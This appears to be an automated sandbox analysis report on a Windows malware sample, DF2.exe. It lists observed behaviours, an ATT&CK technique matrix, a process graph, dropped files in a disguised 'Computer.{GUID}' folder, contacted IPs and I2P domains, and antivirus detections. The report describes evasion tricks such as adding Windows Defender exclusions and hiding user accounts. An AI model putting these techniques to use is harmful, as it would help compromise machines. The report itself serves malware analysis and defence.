Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"Jump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeCode function: 5_2_00007FF764CC6FD5 GetSystemTimeAsFileTime,5_2_00007FF764CC6FD5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FFE0E1638C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,21_2_00007FFE0E1638C3
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: w8m7wmyk939oczmkw4o2h16hs.exe, 00000005.00000002.1697339890.0000023B624D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FFE0E16240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,21_2_00007FFE0E16240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FFE0EB44F8A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,21_2_00007FFE0EB44F8A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FFE1150240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,21_2_00007FFE1150240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FFE11EC254A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,21_2_00007FFE11EC254A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE1177240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FFE1177240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE11BD4F8A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FFE11BD4F8A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE11EC240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FFE11EC240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE126D254A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FFE126D254A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE13201ADA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FFE13201ADA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE133015FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FFE133015FA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE1331B820 listen,htons,recv,select,32_2_00007FFE1331B820
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE1331B7E8 bind,32_2_00007FFE1331B7E8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE1330A7F1 bind,32_2_00007FFE1330A7F1
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
2
Valid Accounts
1
Windows Management Instrumentation
1
Scripting
1
DLL Side-Loading
21
Disable or Modify Tools
1
Network Sniffing
1
System Time Discovery
Remote Services1
Archive Collected Data
2
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
Native API
1
DLL Side-Loading
2
Valid Accounts
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop ProtocolData from Removable Media11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
Command and Scripting Interpreter
1
Create Account
2
Access Token Manipulation
3
Obfuscated Files or Information
Security Account Manager1
System Service Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts3
Service Execution
2
Valid Accounts
4
Windows Service
1
Timestomp
NTDS3
File and Directory Discovery
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchd4
Windows Service
11
Process Injection
1
DLL Side-Loading
LSA Secrets1
Network Sniffing
SSHKeylogging3
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
Services File Permissions Weakness
1
Services File Permissions Weakness
1
File Deletion
Cached Domain Credentials24
System Information Discovery
VNCGUI Input Capture1
Proxy
Data Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Masquerading
DCSync1
Network Share Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
Valid Accounts
Proc Filesystem131
Security Software Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
Access Token Manipulation
/etc/passwd and /etc/shadow31
Virtualization/Sandbox Evasion
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron31
Virtualization/Sandbox Evasion
Network Sniffing2
Process Discovery
Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
Process Injection
Input Capture1
Application Window Discovery
Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
Hidden Users
Keylogging1
System Owner/User Discovery
Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
Services File Permissions Weakness
GUI Input Capture1
System Network Configuration Discovery
Replication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583067 Sample: DF2.exe Startdate: 01/01/2025 Architecture: WINDOWS Score: 100 81 reseed.i2pgit.org 2->81 83 reseed.diva.exchange 2->83 99 Antivirus detection for URL or domain 2->99 101 Multi AV Scanner detection for dropped file 2->101 103 NDIS Filter Driver detected (likely used to intercept and sniff network traffic) 2->103 105 8 other signatures 2->105 9 main.exe 2->9         started        14 DF2.exe 3 2->14         started        16 main.exe 2->16         started        18 2 other processes 2->18 signatures3 process4 dnsIp5 85 5.181.20.93 XTOMxTomEU Russian Federation 9->85 87 88.228.207.122 TTNETTR Turkey 9->87 95 24 other IPs or domains 9->95 67 C:\Windows\Temp\yGODxgsj, PE32+ 9->67 dropped 69 C:\Windows\Temp\bT51Gn7Q, PE32+ 9->69 dropped 71 C:\Windows\Temp\YERHbDgw, PE32+ 9->71 dropped 79 15 other files (13 malicious) 9->79 dropped 123 Multi AV Scanner detection for dropped file 9->123 125 Contains functionality to hide user accounts 9->125 127 Found Tor onion address 9->127 20 WerFault.exe 9->20         started        89 45.200.148.158, 1129, 49730 Africa-on-Cloud-ASZA Seychelles 14->89 73 C:\Users\...\w8m7wmyk939oczmkw4o2h16hs.exe, PE32+ 14->73 dropped 75 C:\Users\...\nju2apmx83wqd9u7namsf59y.exe, PE32+ 14->75 dropped 77 C:\...\4zy7r31p1gb90h9v8yoiitu76a64kr0m.bat, DOS 14->77 dropped 23 nju2apmx83wqd9u7namsf59y.exe 10 14->23         started        26 cmd.exe 1 14->26         started        28 w8m7wmyk939oczmkw4o2h16hs.exe 3 14->28         started        91 173.68.123.78 UUNETUS United States 16->91 93 78.58.99.133 TELIA-LIETUVALT Lithuania 16->93 97 30 other IPs or domains 16->97 30 WerFault.exe 18->30         started        file6 signatures7 process8 file9 63 C:\ProgramData\Microsoft\...\Report.wer, Unicode 20->63 dropped 65 C:\Users\Public\...\main.exe, PE32+ 23->65 dropped 109 Multi AV Scanner detection for dropped file 23->109 111 Contains functionality to hide user accounts 23->111 113 Machine Learning detection for dropped file 23->113 115 Found Tor onion address 23->115 32 taskkill.exe 1 23->32         started        34 sc.exe 1 23->34         started        36 sc.exe 23->36         started        47 4 other processes 23->47 117 Modifies Windows Defender protection settings 26->117 119 Adds a directory exclusion to Windows Defender 26->119 38 powershell.exe 23 26->38         started        41 powershell.exe 23 26->41         started        43 powershell.exe 20 26->43         started        45 conhost.exe 26->45         started        121 Antivirus detection for dropped file 28->121 signatures10 process11 signatures12 49 conhost.exe 32->49         started        51 conhost.exe 34->51         started        53 conhost.exe 36->53         started        107 Loading BitLocker PowerShell Module 38->107 55 conhost.exe 47->55         started        57 conhost.exe 47->57         started        59 conhost.exe 47->59         started        61 conhost.exe 47->61         started        process13

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
DF2.exe6%VirustotalBrowse
DF2.exe0%ReversingLabs
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe100%AviraTR/AVI.Agent.jibab
C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe100%Joe Sandbox ML
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll26%ReversingLabsWin64.Trojan.Generic
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll8%ReversingLabsWin64.Trojan.Generic
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll32%ReversingLabsWin64.Trojan.Generic
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll3%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe70%ReversingLabsWin64.Trojan.Barys
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll8%ReversingLabsWin64.Trojan.Generic
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll3%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll3%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll70%ReversingLabsWin64.Trojan.Generic
